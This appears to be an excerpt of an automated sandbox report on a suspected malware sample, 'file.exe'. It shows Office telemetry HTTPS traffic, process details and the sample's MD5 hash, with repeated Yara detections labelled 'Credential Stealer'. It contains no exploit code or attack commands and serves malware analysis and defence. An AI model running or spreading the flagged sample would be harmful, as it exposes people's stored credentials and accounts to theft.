                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                          x-ms-request-id: e5390902-901e-0015-1805-3db284000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164525Z-178bfbc474bgvl54hC1NYCsfuw00000004s0000000006szc
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:25 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          146192.168.2.54991513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:27 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:27 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1406
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                          x-ms-request-id: 1b4bb325-601e-00ab-374a-3d66f4000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164527Z-15b8b599d88phfhnhC1TEBr51n000000037000000000k0dm
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:27 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          147192.168.2.54991413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:27 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:27 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1360
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                          x-ms-request-id: 6f1de0e6-001e-0034-6c6c-3ddd04000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164527Z-15b8b599d88vp97chC1TEB5pzw000000032g00000000hqc9
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:27 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          148192.168.2.54991713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:27 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:27 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1414
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                          x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164527Z-15b8b599d88wn9hhhC1TEBry0g000000034g00000000mpb7
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:28 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          149192.168.2.54991613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:27 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1369
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                          x-ms-request-id: 4e23fa7b-901e-0048-7ba0-3bb800000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164528Z-15b8b599d88hr8sfhC1TEBbca400000002zg00000000h21w
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:28 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:11:43:58
                                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                          Imagebase:0x1a0000
                                                                                                                                                                                          File size:1'857'536 bytes
                                                                                                                                                                                          MD5 hash:F119A5326D7EF739B4B499912B709BC8
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2186454577.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2086754787.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153552340.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2186353361.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182683548.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154012568.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2211110090.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:11:44:39
                                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:11:44:40
                                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=2012,i,2391827392709409351,7372759067112353565,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                          Start time:11:44:42
                                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                          Start time:11:44:42
                                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,16209135328301955217,6092186935791453691,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          No disassembly